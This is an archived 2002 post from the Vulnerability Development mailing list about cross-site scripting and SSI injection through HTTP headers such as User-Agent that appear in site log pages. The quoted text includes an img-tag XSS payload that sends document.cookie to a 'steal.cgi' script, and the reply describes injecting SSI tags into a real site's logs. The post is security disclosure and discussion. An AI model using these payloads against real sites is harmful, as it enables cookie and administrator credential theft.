Vulnerability Development mailing list archives
Re: XSS And Headers...
From: zeno <bugtraq () cgisecurity net>
Date: Sat, 25 May 2002 16:21:50 -0400 (EDT)
normally it would contain something like... Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705) .. but with a proxy prog (i use proxomitron) you can change it to whatever you like.. for example: <img src="x.jpg" onError="this.src='steal.cgi?document.cookie';"> and if the site logs it, you just got the administrators password:) Now, im yet to come across any sites that this works on because i just thought of it this afternoon but let me know if it works:) in any case, a lot of sites would log/store this kind of information so it should be fixed.
A hole in Analog and W3perl suffered from this problem. I'm sure other software does. I have personally found a example of SSI tag inserting using this method on 1 website running "product unknown". I inserted SSI into the User agent field and visit the site which displayed the logs in a ssi page. It executed the ssi tag in which I inserted. I just wrote a paper on cookie theft with xss that may be worth a peek to you. www.cgisecurity.com/articles/xss-faq.shtml Also see http://www.cgisecurity.net/papers/header-based-exploitation.txt - zeno () cgisecurity com
_________________________________________________________________ MSN Photos is the easiest way to share and print your photos: http://photos.msn.com/support/worldwide.aspx
Current thread:
- XSS And Headers... lok lok (May 25)
- Re: XSS And Headers... Roland Postle (May 26)
- Re: XSS And Headers... zeno (May 26)